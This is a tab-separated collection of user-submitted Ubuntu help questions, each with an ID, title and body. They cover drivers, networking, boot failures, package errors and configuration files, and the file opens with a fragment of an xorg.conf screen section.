endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
508612	which init daemon starts cups ?	i have a fresh installation of ubuntu 14.04 , and have not touched anything . cups is running , as reported by both ps and netstat . there are /etc/init/cups.conf and /etc/init.d/cups , both of them seem to be able to start cups . i used these ways to determine which init daemon started cups : service cups status - `` unknown job : cups '' initctl status cups - `` unknown job : cups '' /etc/init.d/cups status - `` cupsd is running '' runlevel is 2 , and there is no cups in /etc/rc2.d so the question is : which init daemon started cups ? the traditional debian init , or upstart ? if upstart was the one started cups , why initctl status cups can not report cups status ?
508613	tor not working ?	our university provides us with internet but almost all websites are blocked . not even general news reading websites . i tried to use tor but it is not even getting started . all the proxy methods has also failed . is there any other way to get access to all sites ? even sites which explain proxy steps are also blocked.. : ' (
508615	ca n't transfer file to my mobile from laptop using bluetooth	hi m new here n to ubuntu also n i have a query that is about bluetooth i ca n't transfer mp3 file to my mobile n m using ubuntu 14.10.the screen reads `` gdbus.error.org.openobex.error.failed : unable to find service record '' although i can transfer file from my mobile to it .
508617	ubuntu server and ufw as a router - defining ip addresses that can be routed	i built following network with ubuntu server : internet -- -- eth0 ( dhcp , nat ) -- ubuntu1 -- ( eth1 10.1.0.1/16 ) -- -- -- > < -- -- -- ( eth0 10.1.0.2/16 ) -- ubuntu2 -- ( eth1 10.2.0.1/16 ) -- -- -- ... 10.1.0.0/16 - perimeter network 10.2.0.0/16 - internal network ubuntu1 is a router / firewall between internet and perimeter network . ubuntu2 is a router / firewall between perimeter and internal network . first i configured both servers as router and i enabled ufw . ubuntu1 ( server between internet and perimeter network ) is set to masquerade ( nat ) on the public nic and have static route for the internal network on the eth1 . the ubuntu2 is only a router ( net.ipv4.ip_forward=1 , net.ipv6.conf.all.forwarding=1 ) . at this moment everything works and servers on the both networks can access internet and also they can access servers on the opposite network . now i want to secure internal network . i changed setting in the /etc/default/ufw on the ubuntu2 : default_forward_policy= '' drop '' now i would like to specify ip addresses from the internal network that can access perimeter network and internet . the problem is that i do not know how to do that . on ubuntu2 i tried : ufw route allow out on eth0 to 10.2.0.50/16 but the server 10.2.0.50/16 can not access servers on the perimeter and also can not access internet . please can you advise me how to ( using ufw ) set defined ip addresses that can be routed through ubuntu2 ? thank you very much . rendolf
508625	python ( v2.7 ) requires to install plugins to play media files of the following type : windows media audio 8 decoder	when trying to convert some audio files to ogg vorbis using sound converter i get the following error : python ( v2.7 ) requires to install plugins to play media files of the following type : windows media audio 8 decoder any idea where to get this codec or how to install it ? i 'm using ubuntu 14.04 lts
508627	searching for patterns in csv files	i have file.csv that looks like this 4,6,18,23,26 5,12,19,29,31 2,5,13,16,30 9,10,24,27,32 4,5,10,19,22 4,6,8,10,25 2,3,4,25,11 i want to find some patterns and save them in another log file file.log and remove them from the first file . perl or grep ideally for instance , if x+1 = x2 , in range of 3 , remove the row and log its existence in another file and where it existed . so then 2,4,5,25,11 will be removed from file.csv and in file.log i would find something like row 7 : 2,3,4,25,11 was removed from file.csv . i 'm trying to find sequences
508628	dell inspiron 15 3521 video driver problem	no definitions for the graphics card on ubuntu v14.4 what i do to installing it ? and i want to know what is the appropriate version of the operating system ubuntu on my laptop dell 15 3521
508632	serious problem after upgrading to ubuntu 14.04 to 13.10 while booting	i recently upgraded my ubuntu partition from 13.10 to 14.04 . after the upgrade i rebooted the system and got the following error message whilst booting : serious errors were found while checking the disk drive for / . press . i to ignore , s to skip mounting , or m for manual recovery . as i 'm not very skilled in manually recovering data in ubuntu i could not do very much but to skip mounting and to wait for the system to boot , which it did partially but failed to load some kernel packages . eventually i just get a black screen and am only left with rebooting the system again . anyone got the same problem or knows how to solve this problem ?
508633	install libperl-dev	i tried install sudo apt-get install libperl-dev but is not working . i have the message unable to correct problems , you have held broken packages what can i do ? thanks
508635	how can i get ttys to work with nvidia drivers ?	if i 'm debugging my graphics driver , i rely on the commandlines i can access by pressing ctrl+alt+f1-f6 . however , after installing the latest nvidia drivers , the screen goes black when i switch to those ttys . how can i get the ttys to work with the nvidia drivers ? i tried some of the proposals from other questions , like the `` closed as too localized '' question here : how do i get my blacked out ttys back ? and the very involved suggestion here : ca n't view output in tty . ( ctrl+alt+f1 to f6 do n't work , and display a black screen ) . i 'm running ubuntu 14.04 with all the latest updates . here 's some system information : └─ > lspci | grep -i vga 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m mac edition ] ( rev a1 ) └─ > lsmod module size used by pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 27613 0 vboxdrv 409768 3 vboxnetadp , vboxnetflt , vboxpci bnep 19624 2 rfcomm 69160 12 nls_iso8859_1 12713 1 arc4 12608 2 snd_hda_codec_hdmi 46254 1 btusb 32412 0 bluetooth 391196 22 bnep , btusb , rfcomm uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core b43 387371 0 snd_hda_codec_cirrus 18855 1 mac80211 630653 1 b43 cfg80211 484040 2 b43 , mac80211 ssb 62379 1 b43 snd_hda_intel 52355 5 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec_cirrus snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi kvm_intel 143060 0 snd_timer 29482 2 snd_pcm , snd_seq kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 snd 69238 21 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_hda_codec_cirrus , snd_seq_midi ghash_clmulni_intel 13216 0 applesmc 19308 0 input_polldev 13896 1 applesmc aesni_intel 55624 0 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper parport_pc 32701 0 ppdev 17671 0 lpc_ich 21080 0 lp 17759 0 bcma 52096 1 b43 parport 42348 3 lp , ppdev , parport_pc nvidia 10527448 31 soundcore 12680 1 snd drm 303102 2 nvidia video 19476 0 mac_hid 13205 0 apple_bl 13993 0 mei_me 18627 0 mei 82276 1 mei_me hid_apple 13386 0 hid_generic 12548 0 tg3 166442 0 sdhci_pci 23172 0 sdhci 43015 1 sdhci_pci ptp 18933 1 tg3 pps_core 19382 1 ptp ahci 25819 4 usbhid 52570 0 libahci 32560 1 ahci hid 106148 3 hid_generic , usbhid , hid_apple uvesafb 28686 0 edit : i 'm using the package nvidia-340 from the xorg-edgers ppa : └─ > apt-cache policy nvidia-340 nvidia-340 : installed : 340.24-0ubuntu1~xedgers14.04.1 candidate : 340.24-0ubuntu1~xedgers14.04.1 version table : *** 340.24-0ubuntu1~xedgers14.04.1 0 500 http : //ppa.launchpad.net/xorg-edgers/ppa/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status i also tried disabling the framebuffer as described here : http : //forums.linuxmint.com/viewtopic.php ? f=42 & t=168108 # p864284 . still no luck . edit : i 'm now using the package nvidia-343 from the xorg-edgers ppa : └─ > apt-cache policy nvidia-343 nvidia-343 : installed : 343.13-0ubuntu1~xedgers14.04.1 still no luck .
508637	completing a `` minimal virtual machine '' install with a kickstart file	i have built an unattended setup iso for ubuntu 12.04.4 using instructions provided on the community wiki , however , i 'm having a hard time with two specific pieces of the install : the installer hangs for a couple of minutes about three minutes into the installation process , with a `` retrieving file 1 of 1 '' message . the kickstart configuration has it pointed at a local update mirror , so there 's no reason the installer should be trying to call out to the internet ( indeed , the network is set up so that it has no route to do so ) . looking at the created sources.list file after install , i see that the internet-facing security repos have been enabled ( http : //security.ubuntu.com stuff ) . this is the only thing i can see which should lead to this timeout during the install . question the first : what do i need to drop into the kickstart file to ensure this is either disabled outright , or redirected internally ? secondly , despite adopting the preseed settings from the `` minimal virtual machine '' install reached by hitting f4 on the boot screen , my resulting install is hardly minimal . a dead giveaway is that the landscape advertising blurb appears on the motd during my automated install , but not if i select `` minimal virtual machine '' and do the install by hand . question the second : how do i ensure that i get a `` minimal virtual machine '' installation when using kickstart ? below is a version of my kickstart file . this is loaded into the standard 12.04.4 server iso . thanks in advance ! # system language lang en_us # langsupport en_us keyboard us timezone -- utc america/denver # root password ( standard ) rootpw -- iscrypted password-goes-here # skip initial user , root only . user -- disabled # reboot after installation reboot # use text mode install text # install os instead of upgrade install # install from update server ( replace with 'cdrom ' to use local ) url -- url http : //internal-server/archive-ubuntu/ubuntu/ # setup ntp preseed clock-setup/ntp boolean true preseed clock-setup/ntp-server string internal-ntp-server # use our local repo instead of going out to the internet preseed mirror/country string manual preseed mirror/http/hostname string internal-server preseed mirror/http/directory string /archive-ubuntu preseed mirror/http/proxy string preseed mirror/http/mirror internal-server # ensure a minimal install # options taken from iso/preseed/ubuntu-server-minimalvm.seed preseed base-installer/kernel/headers boolean false preseed tasksel/skip-tasks string standard preseed pkgsel/language-pack-patterns string preseed pkgsel/install-language-support boolean false preseed base-installer/kernel/altmeta string lts-saucy # system bootloader configuration bootloader -- location=mbr # for safety , initialize everything # clear the master boot record zerombr yes # partition clearing information clearpart -- all -- initlabel # partition setup # redacted # system authorization information auth -- useshadow -- enablemd5 # network information # redacted # firewall configuration firewall -- disabled # do not configure the x window system skipx
508639	ubuntu software centre does not open after installing itunes	after installing itunes via playonlinux , the ubuntu software centre refuses to open . i did get an error message that itunes was not properly installed and should be reinstalled . but i can not open the software centre to uninstall itunes . my laptop is also now much slower . how do i fix it ?
508643	what does this error message mean	linux newbie , trying to install live boot ubuntu 14.04 amd 64 . i get this message when booting from usb drive , this kernel requires an x86-64 cpu but only detected an i686 cpu , unable to boot . i have an hp desktop , 4 yrs old , and has a dual core athlon ii x2 215 processor ! ! any ideas , i 've been trying to use a live disk or usb for 2 weeks on my system with windows 7 but have not been able to get it to work yet . i 've tried the 32 bit , 64 bit over and over again ! ! ! i want to keep windows 7 on my system and just `` try '' ubuntu , not install or dual boot yet . i use a program called speccy and it says that my system is 64 bit ! also i have tried the ubuntu 32 bit with no results ! !
508647	anyone have luck getting graphics working with an nvidia geforce gt 640m ( imac ) ?	here 's what i 've tried so far : running stock drivers installed by ubuntu 14.04 default install : system is very slow , laggy and jumpy . installing nvidia-current : system boots up to black screen , has to be hard-reboot , and ubuntu completely reinstalled . installing current drivers from nvidia website : ttys do n't work , `` swrast '' module ca n't be loaded , which means unity does n't work , and in other window managers , unity-control-center and other utilities do n't work . i 'm scared to try installing other nvidia drivers , since this is a production machine , and i do n't want to brick it . does anyone have any advice for the best configuration for this card ?
508649	usb mouse causes ubuntu 14.04 to crash	i recently bought a trust maxtrack mini-mouse ( this one ) . usually , it works perfectly fine , but when i close my laptop , and then open it again , all i see is a black screen with one white bar in the upper left corner . this only happens if the mouse is plugged in when i open my laptop . it 's more an annoyance than anything , as i can avoid the problem entirely by unplugging the mouse , but it 's still an annoyance i 'd rather avoid .
508651	theme changes after every other update ( xubuntu )	the strangest thing is happening to me in xubuntu 14.04 . after every other update , my desktop theme is changing from this ( xubuntu default theme ) : to this ( not sure if this is actually a theme ) : no idea on to what is triggering this strange change , that is reverted ( again ) after a few updates have been run . any thoughts on this ?
508655	installing a script in $ path	i am trying to use yeoman in ubuntu . everything is installed correctly but i ca n't use the command yo from bash . if i navigate to the appropriate directory and run node cli.js everything works from the command prompt so i think my issue is that the script is not loaded in my $ path variable . the directory for the script is /home/qtrain/.node/lib/node_modules/yo and the actual script is /home/qtrain/.node/lib/node_modules/yo/cli.js i tried to add the path to the .bashrc file using export path= '' $ path : $ home/.node/lib/node_modules/yo '' but when i restart the terminal and type $ path this is my output : /home/qtrain/enthought/canopy_64bit/user/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/qtrain/.rvm/bin : /home/qtrain/.rvm/bin : /home/qtrain/.node/lib/node_modules/yo : no such file or directory and obviously yo does n't work . my question : am i not adding the $ path correctly ? should i add the directory or the actual script to get this to work in the command line ? furthermore yo was installed using sudo npm install -g yo so it is installed globally . any help would be appreciated .
508659	disabled option `` enable wi-fi '' ubuntu 14.04 ( i have only wi-fi access at home )	i have disabled enable wi-fi function ( ubuntu 14.04 ) . i tried with sudo rfkill unblock all but it does n't work . i have lenovo yoga 2 pro and intel corporation wireless 7260 ( rev 6b ) . can you please tell me what to do ? these http : //ubuntuforums.org/showthread.php ? t=2215044 & page=3 i can not do since i do not have any other internet acces than wi-fi ( but i have another computer )
508665	unable to configure lampp server , stuck in splash screen	i installed lampp server ( downloaded the .tar.xz file then extracted to the /opt folder ) on my ubuntu 12.10 machine , i 'm able to start apache , mysql and everything else but when i open the browser and go to localhost it gives me the xampp splash screen , where i can choose the language but even if i choose a language it redirects me to the same page . is there anything i have to setup that i 'm missing ?
508666	how to delete a manually saved session	i 'm still a newbie to linux and i 'm using kubuntu , please is there a command to delete manually saved sessions that i saved , i know it is possible by going to settings and using the `` start new session '' in kde but i need a command to quickly delete that because kubuntu is restoring the session i saved about 3 weeks ago everytime i login
508667	why is 14.04.1 not showing up as a release upgrade for 12.04 yet ?	i realize this question is a bit of a duplicate , but stack exchange wo n't let me comment on other questions/answers until you have 50 reputation , which seems a bit silly because it means the only way i can ask for or add clarification to an existing question is to open a whole new one . this post asks the same question : why does do-release-upgrade on 12.04 system not find 14.04.1 upgrade ? but people keep saying `` wait for the point release . '' yet if you read the question , the user did in fact specify the fact that the point release has been released . 14.04.1 has been out for 2 weeks today , and i still get this when i try to upgrade : jeremy @ server : ~ $ date fri aug 8 09:38:28 cdt 2014 jeremy @ server : ~ $ sudo do-release-upgrade checking for a new ubuntu release no new release found i do n't want to use the -d or -p option to do-release-upgrade . i want to upgrade in the most correct/supported way possible . if i need to wait i 'll wait . but i 'm perplexed as to why it 's been 2 weeks since the first lts point release ( 14.04.1 ) has been released and my 12.04 systems still do n't see it as an available upgrade path ? if the answer is wait , do we know why we 're waiting or for how long ?
508669	how to create macros	i have genius luxmate i202 . it has fn key . i want to use fn + key to increase or decrease volume . i want to use fn + a type a with umlaut and other german special character
508670	graphics problems on startup	i recently installed ubuntu 14.04 lts alongside windows 8.1 . i started ubuntu successfully maybe three times , then the last time , it stopped responding and i had to restart . ever since then , i could not boot to ubuntu , because i kept getting a graphics error . ( i have an intel ( r ) hd graphics 4000 ) . i looked that up , but i could only find support for nvidia graphics . i also learned that i can login from console login . when i do this , i get a welcome message that stays on the screen for a split second , then i am asked to login again . i ca n't login either way . does anybody have a solution for this ?
508672	use alias inside a script	one of the software tools i 'm using requires `` sh '' to be a symlink to `` bash '' instead of `` dash '' . since i do n't want to change the default shell to bash for the whole system and i ca n't change the tool itself , i 'm trying to write a script that will alias sh to /bin/bash . alias itself does n't work because the call to sh is done by full path : /bin/sh rather than just sh . is there a way to fool an executable that /bin/sh is actually another file , without having root privileges and without affecting other programs ? thanks
508673	how to share folders in 14.04 server with gnome	i 'm working with a new installation of ubuntu server 14.04 64 bit . during installation i picked the samba server option and i believe that it is running . my intention is that an os x machine will be able to share the top folder in a secondary internal disk ( and perhaps a few other folders ) . i can ping the server from my mac . i have a minimal gnome gui installed and am adding functionality as needed . on my 12.04 machine i just right click on a folder and share it . on the server a right click does not bring up anything to do with sharing so i probably need to install something or edit some file . how do i enable sharing on a folder ? [ edit ] i ca n't detect that samba is actually running !
508677	unity webapp broken in 14.04	i run a steampunk writing/social network site citizens of antiford and the unity integration works in 13.10 , but not in 14.04 steps : go to site see integration popup click 'yes' in 13.10 : the app to show up in the taskbar/launcher and in the dash under applications in 14.04 : nothing . i never get the message again and there are no icons for the web app anywhere . if you 're curious , the code is here : https : //citizensofantiford.com/js/unity.js
508678	packaging using quickly and python 3	i have written an application using quickly with python 3 . i have adjusted everything necessary for running with python 3 , converted headers to # ! /usr/bin/python3 , fixed helpers.py , etc . but when i run quickly package the structure of the output .deb is /usr/lib/python2.7/dist-packages/ . how can i adjust this so it installs to /usr/lib/python3/dist-packages/ ?
508679	enable firewall in ubuntu	hi i am running apache server in my desktop which does contain security issues so i want to enable how to enable firewall in ubuntu 14.04 .
508682	please help me disable authentication !	this is very annoying . i do n't want to sound like a drag or anything to you security people but i switched over from windows and everytime i install or do something i need to type a password . is there anyway to disable this ? ( and please do n't try to talk me out of it . its legitly annoying . ) edit : i 'm going back to windows . this is just too annoying . first removing of gnome and then forcing this garbage . what is this ? nsabuntu ?
508683	loud fan , high cpu temperature , video card issues after upgrade to 14.04	i recently upgraded to 14.04 from 13.10 . the upgrade process reported some errors , apparently related to nvidia packages , but finished nevertheless . after the upgrade , the fan on my laptop has been spinning loudly a lot of the time and psensor reports cpu core temperatures of 67-80 째c , with cpu usage at 10-20 % . as i never bothered to check the temperatures before the upgrade , i do n't know if this was the case before the upgrade as well , but at least the fan was n't making as much noise earlier . video performance also felt sluggish after the upgrade ; desktop effects , specifically , were slow . i thought that the whole issue might have something to do with nvidia drivers or bumblebee , so i purged everything related to those and went back to using the nouveau driver , but left things at that since i do n't really know what to do next . my laptop has an nvidia 540m and an integrated intel graphics chip . any ideas ? is there an easy way to check what exactly went wrong with the upgrade ?
508684	ubuntu server blinking cursor after fresh install	ubuntu newbie here , i am installing ubuntu server 14 on an ssd on a lenovo thinkcentre , and every time i install completely , i receive the dreaded blinking cursor . but , here is the kicker , if i put in the media i used to install ubuntu server with , and select from the bios boot options menu to start-up to the install media , it runs ubuntu server with no problems . i reinstalled ubuntu on the ssd twice now , and i even explicitly noted that grub boot loader be installed on the ssd . but , i can not , for the life of me , boot the machine up to ubuntu server without having to select the ubuntu server install media to boot to via bios . i should also note that there are no other hdd/ssds running off of the motherboard , and i am not dual-booting . i am running ubuntu server strictly and fully off of one ssd . any ideas ? thanks !
508685	modifier only ibus keyboard layout switching in kde	i recently upgraded to kubuntu 14.04 . i used to have shift+alt as a shortcut to change keyboard layouts back in 12.04 but its not working now . i see < shift > < meta > as next input shortcut in ibus-setup but apparently its not working . i can assign other shortcuts like ctrl+space and it works fine . i am aware that there was some issue with modifier only shortcuts , in unity however this seems to have been fixed in gnome-settings-daemon 3.8.6.1-0ubuntu11 . indeed if i switch to unity this shortcut works flawlessly but not in kde . any help will be greatly appreciated . thanks
508689	how can i install pg_test_fsync on ubuntu server 14.04 ?	i attempted to install pg_test_fsync on ubuntu 14.04 lts and it appears it can not be installed without removing postgresql . how can i install pg_test_fsync and keep postgresql ? $ pg_test_fsync the program 'pg_test_fsync ' is currently not installed . you can install it by typing : sudo apt-get install postgres-xc $ sudo apt-get install postgres-xc reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libpq5 postgres-xc-client suggested packages : postgresql-xc-doc the following packages will be removed : postgresql postgresql-9.3 postgresql-client postgresql-client-9.3 postgresql-client-common postgresql-common postgresql-contrib postgresql-contrib-9.3 the following new packages will be installed : postgres-xc postgres-xc-client the following packages will be upgraded : libpq5 1 upgraded , 2 newly installed , 8 to remove and 1 not upgraded . need to get 4,698 kb of archives . after this operation , 5,394 kb of additional disk space will be used . do you want to continue ? [ y/n ] n abort . $
508690	ssh-agent keeping key unlocked longer than it should	i have been having some issues regarding my ssh passphrase and ssh-agent . my intent is that i would like to be prompted for my passphrase for my ssh key everytime i close my terminal an then try to ssh into something after opening a new terminal . currently what happens is that the key remains unlocked for the duration of my desktop session . the only way to be prompted to unlock my key again seems to be to restart my computer . this is n't a very secure solution , so i am hoping someone can give me a hand . currently i am using ubuntu 14.04 , and i am using terminator as a terminal . all help would be greatly appreciated !
508691	dual monitor resolutions wo n't stick after boot unknown	i had a brownout last night , which forced my cpu to reboot . when it came back up , my dual monitors had the incorrect resolution . now i have to set them manually after startup . my main monitor is an asus and is recognized as ancor communications inc. 24 '' . my secondary monitor is a viewsonic and is recognized as unknown . i checked my ~/.config/monitors.xml file and get the follow : < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' vga-0 '' > < vendor > vsc < /vendor > < product > 0x3919 < /product > < serial > 0x01010101 < /serial > < width > 1280 < /width > < height > 1024 < /height > < rate > 60 < /rate > < x > 1920 < /x > < y > 56 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' hdmi-0 '' > < /output > < output name= '' dvi-0 '' > < vendor > aci < /vendor > < product > 0x2494 < /product > < serial > 0x01010101 < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < /configuration > < configuration > < clone > no < /clone > < output name= '' vga-0 '' > < vendor > ? ? ? < /vendor > < product > 0x0000 < /product > < serial > 0x00000000 < /serial > < width > 1280 < /width > < height > 1024 < /height > < rate > 75 < /rate > < x > 1920 < /x > < y > 27 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < output name= '' hdmi-0 '' > < /output > < output name= '' dvi-0 '' > < vendor > aci < /vendor > < product > 0x2494 < /product > < serial > 0x01010101 < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < /configuration > < /monitors > i noticed the < vendor > ? ? ? < /vendor > and duplicate section so removed both , leaving the first < configuration > ... < /configuration > . that did n't help . lastly , i need to run xrandr -- addmode vga-0 1280x1024 before i can set my secondard montior to the correct resolution . cpu information os : ubuntu 12.04 lts processor : amd athlon ( tm ) ii x3 440 processor ă 3 video card is : gallium 0.4 on amd rv730 os type : 64-bit any ideas what 's going on ? **i added the same monitors.xml ( without duplicates ) to my /etc/gnome-settings-daemon/xrandr/ directory but have n't restarted . i will edit this post after . edit so adding /etc/gnome-settings-daemon/xrandr/monitors.xmlwith the above information yielded an error saying it could not apply those settings . i noticed themonitors.xmlfile in was edited with the duplicatetags and with ? ? ? ` as i described above . i did run xrandr -- addmode vga-0 1280x1024 as usual and both monitors were corrected afterwards . usually i have to manually set the correct resolutions .
508692	no sound in 14.04	i have the same problem that the user in `` dummy output in ubuntu 14.04 '' . the difference is that cat /proc/asound/card0/codec* | grep codec outputs : cat : /proc/asound/card0/codec* : no existe el archivo o el directorio ( it 's in spanish , it means it can not find the file or directory ) more info : $ sudo modprobe snd-hda-intel modprobe : fatal : module snd-hda-intel not found . $ sudo alsa force-reload unloading alsa sound driver modules : ( none loaded ) . loading alsa sound driver modules : ( none to reload ) . $ sudo aplay -l aplay : device_list:268 : no soundcards found ... $ lspci | grep -i audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) $ lspci -v | grep audio ( nothing ) $ locate snd-hda-intel ( nothing ) $ lsmod | grep snd ( nothing )
508695	installing ubuntu on usb drive	i want to install usb drive to use it as a pc wherever i go . i am seeing so many distributions along with architecture like intel x86 or amd x86 . so which distribution should i use ?
508700	new ubuntu server 14.04 installation does n't boot	so i installed ubuntu server 14.04 into my old pc . i used an external usb flash drive , because i could n't get the optical drives to work . installation went fie without problems . however , after installation , it would n't load it . grub would open if i pressed escape , but when i select ubuntu , the screen goes blank and the hard drive led is steady on ( not blinking ) . thanks in advance .
508701	package operation failed-please help	whenever i try to open ubuntu software center it says my files are corrupted , when i click repair , it says , `` package operation failed the installation or removal of a software package failed details installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 255659 files and directories currently installed . ) preparing to unpack ... /tor_0.2.4.20-1_i386.deb ... unpacking tor ( 0.2.4.20-1 ) ... dpkg : error processing archive /var/cache/apt/archives/tor_0.2.4.20-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/tor ' , which is also in package tor-browser 3.5.4 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/tor_0.2.4.20-1_i386.deb error in function : dpkg : dependency problems prevent configuration of vidalia : vidalia depends on tor ( > = 0.2.2.29-beta-1 ) ; however : package tor is not installed . dpkg : error processing package vidalia ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tor-geoipdb : tor-geoipdb depends on tor ( > = 0.2.4.20-1 ) ; however : package tor is not installed . dpkg : error processing package tor-geoipdb ( -- configure ) : dependency problems - leaving unconfigured
508703	apache nfs - permission denied when has group access	i have added www-data to my $ user group . there are files on my local hard drive with 750 permissions ( rwxr-x -- - ) with owners being $ user : $ user , which can be accessed from the website . however , the website can not access files with the same permissions on an nfs , unless i change the group ownership to www-data , or give read access to `` other '' . is this expected or is there a configuration i need to add to my apache config ? both the nfs server and the local machine are running ubuntu 14.04 . apache config < virtualhost *:80 > servername media.mydomain.com serveradmin webmaster @ localhost documentroot /var/www/vhosts/site < directory /var/www/vhosts/site/ > options indexes followsymlinks allowoverride all order allow , deny allow from all require all granted < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost >
508705	problem after kernel recompilation of version 3.10.48	i 'm using ubuntu 14.04 on vmware . i currently have kernel version 3.13.0-24-generic . for project purpose we are doing kernel recompilation and downgrading my current version to 3.10.48 . it successfully completed with installing new kernel . but when the menu appears where we have to select with the kernel version and i press enter to go forward with the version 3.10.48 , it gets stuck up with just the cursor on the screen and does n't proceed . how do i go about this problem ?
508708	dev/ttys and comand chirp	trying to use chirp to program with ic208h keep getting error ( ould not open port /dev/ttys0 : [ errno 13 ] permission denied : '/dev/ttys0 ' ) how do i fix this i read 2 other post about this but could n't get those solutions to work either
508710	limit ftp users to home directory on webmin	i 'm using proftp on webmin , ubuntu 14.04 . i need to make ftp accounts for clients , who are limited to just a specified folder with no other access to the server . i would prefer if it was secure . i originally had it working by creating a new user under system- > users , i was able to log in but also able to navigate the directory tree . i saw on another post that it was the incorrect way to do this . if it helps , i 'm trying to recreate ftp accounts - > new user on cpanel . like thanks for the help !
508714	-gt : unary operator expected error on bash	this is simple script i = `` 1 '' ; b = `` 4 '' ; if [ `` $ i '' -gt `` $ b '' ] then echo `` '' fi why i got [ : -gt : unary operator expected what is wong ?
508716	problem connecting ubuntu 14.04 wifi to 802.11 network	i am having trouble connecting my ubuntu 14.04 wifi to 802.11 secured network . i use a dual boot 8.1 - ubuntu 14.04 system . my network uses cyberoam authentication.the wireless connects and works perfectly in 8.1 , but is unable to connect in ubuntu . please provide me with possible solutions . my ubuntu connects fine with local ad-hoc networks .
508719	shared library problem : openmesh	i have a qt app with openmesh dependency . i built the openmesh library from source : cmake ... make make install it installed to the /usr/local/lib/openmesh folder : libopenmeshcored.a libopenmeshcored.so.3.2 libopenmeshtoolsd.so libopenmeshcored.so libopenmeshtoolsd.a libopenmeshtoolsd.so.3.2 the libs are included into the qt project . libs += -l/usr/local/lib/openmesh/ \ -lopenmeshcored \ -lopenmeshtoolsd when i start the application from qt creator , it works fine . but if i start the built executable from command line , it gives back the following error : error while loading shared libraries : libopenmeshcored.so.3.2 : can not open shared object file : no such file or directory so why does it know about , where to find the shared objects , when i start it from qt , and why not , when i start without it ? and how can i fix this problem ?
508720	how can i change cursor color in ubuntu ?	how can i set my mouse cursor to be black on ubuntu 14.04 ?
508725	how to install terminology emulator on ubuntu 14.04 ?	it is possible to install terminology on ubuntu 14.04 ? i did n't find anything helpful . thanks !
508730	ubuntu 14.04 not discovering wireless router	my ubuntu version 14.04 suddenly stopped discovering my comcast wireless router . i can see other routers . i can also connect to it by `` connect to a hidden wifi network.. '' . is this a router configuration issue ? below is the ubuntu release and wireless hardware information . cat /etc/lsb-release distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04.1 lts '' add wireless hardware # # # # # lspci # # # # # 06:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : hewlett-packard company bcm4311 802.11b/g wireless lan controller [ 103c:1363 ] kernel driver in use : b43-pci-bridge
